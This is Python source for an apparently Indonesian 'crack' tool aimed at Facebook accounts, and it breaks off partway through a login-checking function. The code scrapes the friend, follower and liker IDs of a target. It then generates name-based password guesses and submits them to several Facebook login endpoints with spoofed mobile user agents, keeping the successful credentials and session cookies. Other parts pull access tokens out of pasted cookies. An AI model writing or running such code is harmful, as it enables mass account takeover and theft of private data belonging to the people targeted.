ua_asus    = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_huawei  = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_vivo    = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_oppo    = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
def jalan(z):
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.04)
def mlaku(z):
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)
def clear():
    if "linux" in sys.platform.lower():os.system("clear")
    elif "win" in sys.platform.lower():os.system("cls")
    else:os.system("clear")
def banner():
    print("\n%s    _________ __     \n%s   / ____/ (_) /____  ║ %sAuthor: %sMark Cornel %s %sWa:+2347013107449\n%s  / __/ / / / __/ _ \ ║ %sFB %s: %sFacebook.com/1000xxxx\n%s / /___/ / / /_/  __/ ║ %sFB %s: %sMark.Cornel8\n%s/_____/_/_/\__/\___/  ║ %sGithub%s:%sGithub.com/GUPTA-SHAKEL\n"%(O,O,P,O,P,O,O,P,O,P,O,P,O,P,O,P,O,P))
def menu_log():
    os.system('rm -rf token.txt')
    clear()
    banner()
    var_menu()
    pmu = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pmu in ['']:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu_log()
    elif pmu in ['1','01','001','a']:
        defaultua()
        token = input('%s╚══[%s•%s] %sToken : '%(O,P,O,P))
        try:
            x = requests.get("https://graph.facebook.com/me?access_token=" + token)
            y = json.loads(x.text)
            n = y['name']
            xd = open("token.txt", "w")
            xd.write(token)
            xd.close()
            #print('%s║'%(O))
            #jalan('%s╚══[%s!%s] %sLogin Successful'%(O,P,O,P))
            exit(BeautifulSoup.main())
            #menu()
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sToken Invalid'%(M,P,M,P))
            os.system('rm -rf token.txt')
            menu_log()
        except requests.exceptions.ConnectionError:
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
            exit()
    elif pmu in ['2','02','002','b']:
        defaultua()
        cookie = input('%s╚══[%s•%s] %sCookies : '%(O,P,O,P))
        try:
            data = requests.get("https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_", headers = {
            "user-agent"                : "Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36", # Jangan Di Ganti Ea Anjink.
            "referer"                   : "https://m.facebook.com/",
            "host"                      : "m.facebook.com",
            "origin"                    : "https://m.facebook.com",
            "upgrade-insecure-requests" : "1",
            "accept-language"           : "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
            "cache-control"             : "max-age=0",
            "accept"                    : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "content-type"              : "text/html; charset=utf-8"
            }, cookies = {
            "cookie"                    : cookie
            })
            find_token = re.search("(EAAA\w+)", data.text)
            hasil = "\n* Fail : maybe your cookie invalid !!" if (find_token is None) else "\n* Your fb access token : " + find_token.group(1)
            xd = open("token.txt", "w")
            xd.write(find_token.group(1))
            xd.close()
            #print('%s║'%(O))
            #jalan('%s╚══[%s!%s] %sLogin Successful'%(O,P,O,P))
            exit(BeautifulSoup.main())
            #menu()
        except requests.exceptions.ConnectionError:
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
            exit()
        except (KeyError,IOError,AttributeError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sCookies Invalid'%(M,P,M,P))
            os.system('rm -rf token.txt')
            menu_log()
    elif pmu in ['3','03','003','c']:
        clear()
        banner()
        var_tutor()
        pf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
        print('%s║'%(O))
        if pf in ['']:
            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
            menu_log()
        elif pf in ['1','01','001','a']:
            os.system('xdg-open https://wa.me/+2347013107449')
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['2','02','002','b']:
            os.system('xdg-open https://www.facebook.com/Mark.Cornel8')
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['3','03','003','c']:
            os.system('xdg-open https://wa.me/+2347013107449')
            tutor_target()
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        elif pf in ['4','04','004','d']:
            tutor_crack()
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu_log()
        else:
            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
            menu_log()
    elif pmu in ['4','04','004','d']:
        clear()
        banner()
        var_author()
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu_log()
    elif pmu in ['0','00','000','e']:
        jalan('%s╠══[%s!%s] %sThank You For Using This SC'%(O,P,O,P))
        jalan('%s╚══[%s!%s] %sHave a Nice Day :)\n'%(O,P,O,P))
        os.system('rm -rf token.txt')
        clear()
        exit()
    else:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu_log()
def menu():
    clear()
    banner()
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        kun = lisensi.split('-')
        users = wk['username']
        mailerts = wk['email'].split('@')
        mailert1 = mailerts[0]
        mailert2 = mailerts[1]
        mailer = mailert1[:2]
        maile = (mailer+'xxxxx@'+mailert2)
        bergabung = wk['joined']
        kadaluarsa = wk['expired']
        status = ('%sPremium [%sPro%s]'%(O,P,O))
        kunci = ('%s%s%s-%s%s%s-%sXXXXX'%(O,kun[0],P,O,kun[1],P,O))
        pro = ''
        upgrade = 'Change License Key'
        jid = ''
    except (KeyError,IOError):
        status = 'P R E M I U M'
        users = '-'
        maile = '-'
        kunci = '-'
        bergabung = '-'
        kadaluarsa = '-'
        pro = ("%s[%sPro%s]"%(O,P,O))
        upgrade = ('Upgrade To Version %s--'%(O))
        jid = ('%s[%s50000%s]'%(O,P,O))
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
        i = y['id']
    except (KeyError,IOError):
        print('%s╔══[ %sOh %s]%s'%(M,P,M,P))
        print('%s║'%(M))
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        print('%s╔══[ %sOh %s]%s'%(M,P,M,P))
        print('%s║'%(M))
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    a = requests.get("http://ip-api.com/json/",headers={"Referer":"http://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}).json()
    try:
        ip = a["query"]
    except KeyError:
        ip = " "
    print('%s╔══[ %sWellcome %s %s]'%(O,P,n,O))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sID : %s'%(O,P,O,P,i))
    print('%s╠══[%s•%s] %sIP : %s'%(O,P,O,P,ip))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sStatus : %s'%(O,P,O,P,status))
    print('%s╠══[%s•%s] %sName : Mark Cornel %s'%(O,P,O,P,users))
    print('%s╠══[%s•%s] %sEmail : ngoziclinton44@gmail.com%s'%(O,P,O,P,maile))
    print('%s╠══[%s•%s] %sKey : Xxxxxxxx%s'%(O,P,O,P,kunci))
    print('%s╠══[%s•%s] %sJoin Since : 29-12-2021%s'%(O,P,O,P,bergabung))
    print('%s╠══[%s•%s] %sValid until : 2030%s'%(O,P,O,P,kadaluarsa))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sCrack From Public %s'%(O,P,O,P,jid))
    print('%s╠══[%s2%s] %sCrack From Follower %s'%(O,P,O,P,jid))
    print('%s╠══[%s3%s] %sCrack From likes post %s'%(O,P,O,P,jid))
    print('%s╠══[%s4%s] %sRetrieve Target Data'%(O,P,O,P))
    print('%s╠══[%s5%s] %sTaking Number of Friends %s'%(O,P,O,P,pro))
    print('%s╠══[%s6%s] %sCheck Crack Results'%(O,P,O,P))
    print('%s╠══[%s7%s] %sCheck Crack Result Options %s'%(O,P,O,P,pro))
    print('%s╠══[%s8%s] %sUser Agent'%(O,P,O,P))
    print('%s╠══[%s9%s] %s%s'%(O,P,O,P,upgrade))
    print('%s╠══[%s0%s] %sLog Out'%(O,P,O,P))
    pm = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pm in ['']:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
    elif pm in ['1','01','001','a']:
        publik()
    elif pm in ['2','02','002','b']:
        pengikut()
    elif pm in ['3','03','003','c']:
        likers()
    elif pm in ['4','04','004','d']:
        target()
    elif pm in ['5','05','005','e']:
        teman_target()
    elif pm in ['6','06','006','f']:
        hasil()
    elif pm in ['7','07','007','g']:
        cek_hasil()
    elif pm in ['8','08','008','h']:
        ugen()
    elif pm in ['9','09','009','i']:
        buy_license()
    elif pm in ['0','00','000','j']:
        jalan('%s╚══[%s!%s] %sSee you later'%(O,P,O,P))
        os.system('rm -rf token.txt')
        menu_log()
    else:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
def defaultua():
    ua = ua_nokia
    try:
        ugent = open('ugent.txt','w')
        ugent.write(ua)
        ugent.close()
    except (KeyError,IOError):
        menu_log()
def ugen():
    var_ugen()
    pmu = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pmu in[""]:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu()
    elif pmu in ['1','01','001','a']:
        os.system('xdg-open https://www.google.com/search?q=My+User+Agent&oq=My+User+Agent&aqs=chrome..69i57j0l3j0i22i30l6.4674j0j1&sourceid=chrome&ie=UTF-8')
        input('%s╚══[ %sBack %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['2','02','002','b']:
        os.system("rm -rf ugent.txt")
        ua = input("%s╚══[%s•%s] %sEnter User Agent : \n\n"%(O,P,O,P))
        try:
            ugent = open('ugent.txt','w')
            ugent.write(ua)
            ugent.close()
            jalan("\n%s╔══[ %sSuccesfully Changed User Agent %s]"%(O,P,O))
            print('%s║'%(O))
            input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
            menu()
        except (KeyError,IOError):
            jalan("\n%s╔══[ %sFailed to Change User Agent %s]"%(M,P,M))
            print('%s║'%(M))
            input('%s╚══[ %sBack %s]%s'%(M,P,M,P))
            menu()
    elif pmu in ['3','03','003','c']:
        ugen_hp()
    elif pmu in ['4','04','004','d']:
        os.system("rm -rf ugent.txt")
        jalan("%s╠══[ %sUser Agent Deleted Successfully %s]"%(O,P,O))
        print('%s║'%(O))
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['5','05','005','e']:
        try:
            ungser = open('ugent.txt', 'r').read()
        except (KeyError,IOError):
            ungser = 'Not Found'
        print("%s╚══[%s•%s] %sYour User Agent  : \n\n%s%s"%(O,P,O,P,O,ungser))
        jalan("\n%s╔══[ %sThis is your current user agent %s]"%(O,P,O))
        print('%s║'%(O))
        input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
        menu()
    elif pmu in ['0','00','000','f']:
        menu()
    else:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
def ugen_hp():
    os.system("rm -rf ugent.txt")
    print('%s╠══[%s1%s] %sXiaomi'%(O,P,O,P))
    print('%s╠══[%s2%s] %sNokia'%(O,P,O,P))
    print('%s╠══[%s3%s] %sAsus'%(O,P,O,P))
    print('%s╠══[%s4%s] %sHuawei'%(O,P,O,P))
    print('%s╠══[%s5%s] %sVivo'%(O,P,O,P))
    print('%s╠══[%s6%s] %sOppo'%(O,P,O,P))
    print('%s╠══[%s7%s] %sSamsung'%(O,P,O,P))
    print('%s╠══[%s8%s] %sWindows'%(O,P,O,P))
    pc = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    print('%s║'%(O))
    if pc in['']:jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P));menu()
    elif pc in ['1','01']:
        ugent = open('ugent.txt','w');ugent.write(ua_xiaomi);ugent.close()
    elif pc in ['2','02']:
        ugent = open('ugent.txt','w');ugent.write(ua_nokia);ugent.close()
    elif pc in ['3','03']:
        ugent = open('ugent.txt','w');ugent.write(ua_asus);ugent.close()
    elif pc in ['4','04']:
        ugent = open('ugent.txt','w');ugent.write(ua_huawei);ugent.close()
    elif pc in ['5','05']:
        ugent = open('ugent.txt','w');ugent.write(ua_vivo);ugent.close()
    elif pc in ['6','06']:
        ugent = open('ugent.txt','w');ugent.write(ua_oppo);ugent.close()
    elif pc in ['7','07']:
        ugent = open('ugent.txt','w');ugent.write(ua_samsung);ugent.close()
    elif pc in ['8','08']:
        ugent = open('ugent.txt','w');ugent.write(ua_windows);ugent.close()
    else:jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P));menu()
    jalan("%s╠══[ %sSuccessfully Changed User Agent %s]"%(O,P,O))
    print('%s║'%(O))
    input('%s╚══[ %sBack %s]%s'%(O,P,O,P))
    menu()
def publik():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '5000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sINPUT ID'%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/friends?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def pengikut():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '10000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sInput ID '%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def likers():
    try:
        lisensi = open("license.txt","r").read()
        wl = requests.get(url_license + lisensi)
        wk = json.loads(wl.text)
        wj = wk['username']
        jid = '10000'
    except (KeyError,IOError):
        jid = '5000'
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        token = open("token.txt","r").read()
        x = requests.get("https://graph.facebook.com/me?access_token=" + token)
        y = json.loads(x.text)
        n = y['name']
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        os.system('rm -rf token.txt')
        menu_log()
    except requests.exceptions.ConnectionError:
        jalan('%s╚══[%s!%s] %sConnection Problem'%(M,P,M,P))
        exit()
    try:
        print('%s╠══[%s•%s] %sINPUT ID'%(O,P,O,P))
        it = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
        try:
            pb = requests.get("https://graph.facebook.com/" + it + "?access_token=" + token)
            ob = json.loads(pb.text)
            print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,ob['name']))
        except (KeyError,IOError):
            print('%s║'%(O))
            jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P))
            menu()
        r = requests.get("https://graph.facebook.com/%s/likes?limit=%s&access_token=%s"%(it,jid,token))
        id = []
        z = json.loads(r.text)
        xc = (ob["first_name"]+".json").replace(" ","_")
        xb = open(xc,"w")
        for a in z["data"]:
            id.append(a["id"]+"•"+a["name"])
            xb.write(a["id"]+"•"+a["name"]+"\n")
        xb.close()
        print('%s╠══[%s•%s] %sTotal ID : %s'%(O,P,O,P,len(id)))
        return crack(xc)
    except Exception as e:
        exit('%s╚══[%s!%s] %sError : %s'%(M,P,M,P,e))
def generate1(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"786")
                _dapunta_.append(i+"1122")
            elif len(i)>=6:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"786")
                _dapunta_.append(i+"1122")
            else:
                continue
    _dapunta_.append(_cici_.lower())
    return _dapunta_
def generate2(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
            else:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
    _dapunta_.append(_cici_.lower())
    _dapunta_.append("223344")
    _dapunta_.append("556677")
    _dapunta_.append("445566")
    return _dapunta_
def generate3(_cici_):
    _dapunta_=[]
    for i in _cici_.split(" "):
        if len(i)<3:
            continue
        else:
            i=i.lower()
            if len(i)==3 or len(i)==4 or len(i)==5:
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
            else:
                _dapunta_.append(i)
                _dapunta_.append(i+"123")
                _dapunta_.append(i+"12345")
                _dapunta_.append(i+"1234")
                _dapunta_.append(i+"1122")
                _dapunta_.append(i+"786")
    _dapunta_.append(_cici_.lower())
    _dapunta_.append("pakistan")
    _dapunta_.append("pakistan123")
    _dapunta_.append("786786")
    _dapunta_.append("khankhan")
    _dapunta_.append("223344")
    _dapunta_.append("khan1234")
    return _dapunta_
def generate4(_cici_):
    _dapunta_=[]
    ps = open('pass.txt','r').read()
    pp = open('passangka.txt','r').read()
    for i in _cici_.split(" "):  
        i=i.lower()
        if len(i)<3:continue
        elif len(i)==3 or len(i)==4 or len(i)==5:
            _dapunta_.append(i+"123")
            _dapunta_.append(i+"12345")
            _dapunta_.append(i+"1234")
            _dapunta_.append(i+"1122")
            _dapunta_.append(i+"786")
        else:
            _dapunta_.append(i)
            _dapunta_.append(i+"123")
            _dapunta_.append(i+"12345")
            _dapunta_.append(i+"1234")
            _dapunta_.append(i+"1122")
            _dapunta_.append(i+"786")
    if pp in ['',' ','  ']:pass
    else:
        for i in _cici_.split(" "):  
            i=i.lower()
            for x in pp.split(','):
                _dapunta_.append(i+x)
    if ps in ['',' ','  ']:pass
    else:
        for z in ps.split(','):
            _dapunta_.append(z)
    _dapunta_.append(_cici_.lower())
    return _dapunta_
def tambah_pass():
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sFor Example :  102030,123456,786786'%(O,P,O,P))
    cuy = input('%s╠══[%s•%s] %sEnter Manual Additional Pass [1 Kata] : '%(O,P,O,P))
    gh = open('pass.txt','w')
    gh.write(cuy)
    gh.close
def tambah_pass_angka():
    print('%s╠══[%s•%s] %sFor Example : 321,786,1122,123'%(O,P,O,P))
    coy = input('%s╠══[%s•%s] %sEnter Additional Pass Behind Name : '%(O,P,O,P))
    xy = open('passangka.txt','w')
    xy.write(coy)
    xy.close
    
def log_api(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    header = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)),
        "x-fb-sim-hni": str(random.randint(20000, 40000)),
        "x-fb-net-hni": str(random.randint(20000, 40000)),
        "x-fb-connection-quality": "EXCELLENT",
        "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
        "user-agent": ua,
        "content-type": "application/x-www-form-urlencoded",
        "x-fb-http-engine": "Liger"}
    param = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 
        'format': 'json', 
        'sdk_version': '2', 
        'email': em, 
        'locale': 'en_US', 
        'password': pas, 
        'sdk': 'ios', 
        'generate_session_cookies': '1', 
        'sig':'3f555f99fb61fcd7aa0c44f58f522ef6'}
    api = 'https://b-api.facebook.com/method/auth.login'
    response = r.get(api, params=param, headers=header)
    if 'session_key' in response.text and 'EAAA' in response.text:
        return {"status":"success","email":em,"pass":pas}
    elif 'www.facebook.com' in response.json()['error_msg']:
        return {"status":"cp","email":em,"pass":pas}
    else:return {"status":"error","email":em,"pass":pas}
def log_mbasic(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    r.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    p = r.get("https://mbasic.facebook.com/")
    b = bs4.BeautifulSoup(p.text,"html.parser")
    meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
    data={}
    for i in b("input"):
        if i.get("value") is None:
            if i.get("name")=="email":
                data.update({"email":em})
            elif i.get("name")=="pass":
                data.update({"pass":pas})
            else:
                data.update({i.get("name"):""})
        else:
            data.update({i.get("name"):i.get("value")})
    data.update(
        {"fb_dtsg":meta,"m_sess":"","__user":"0",
        "__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
        }
    )
    r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
    po = r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
    if "c_user" in list(r.cookies.get_dict().keys()):
        return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    elif "checkpoint" in list(r.cookies.get_dict().keys()):
        return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    else:return {"status":"error","email":em,"pass":pas}
def log_free(em,pas,hosts):
    ua = open('ugent.txt','r').read()
    r = requests.Session()
    r.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    p = r.get("https://free.facebook.com/")
    b = bs4.BeautifulSoup(p.text,"html.parser")
    meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
    data={}
    for i in b("input"):
        if i.get("value") is None:
            if i.get("name")=="email":
                data.update({"email":em})
            elif i.get("name")=="pass":
                data.update({"pass":pas})
            else:
                data.update({i.get("name"):""})
        else:
            data.update({i.get("name"):i.get("value")})
    data.update(
        {"fb_dtsg":meta,"m_sess":"","__user":"0",
        "__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
        }
    )
    r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
    po = r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
    if "c_user" in list(r.cookies.get_dict().keys()):
        return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    elif "checkpoint" in list(r.cookies.get_dict().keys()):
        return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
    else:return {"status":"error","email":em,"pass":pas}
def cek_log(user, pasw, h_cp):
    ua = "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36"
    mb = "https://mbasic.facebook.com"
    ses = requests.Session()
    ses.headers.update({
    "Host": "mbasic.facebook.com",
    "cache-control": "max-age=0",
    "upgrade-insecure-requests": "1",
    "origin": mb,
    "content-type": "application/x-www-form-urlencoded",
    "user-agent": ua,
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "x-requested-with": "mark.via.gp",
    "sec-fetch-site": "same-origin",
    "sec-fetch-mode": "navigate",
    "sec-fetch-user": "?1",
    "sec-fetch-dest": "document",
    "referer": mb+"/login/?next&ref=dbl&fl&refid=8",
    "accept-encoding": "gzip, deflate",
    "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
    })
    data = {}
    ged = par(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    try:
        run = par(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    except requests.exceptions.TooManyRedirects:
        print("[!] Redirect Overload")
    if "c_user" in ses.cookies:
        return {"status":"error","email":user,"pass":pasw}
    elif "checkpoint" in ses.cookies:
        form = run.find("form")
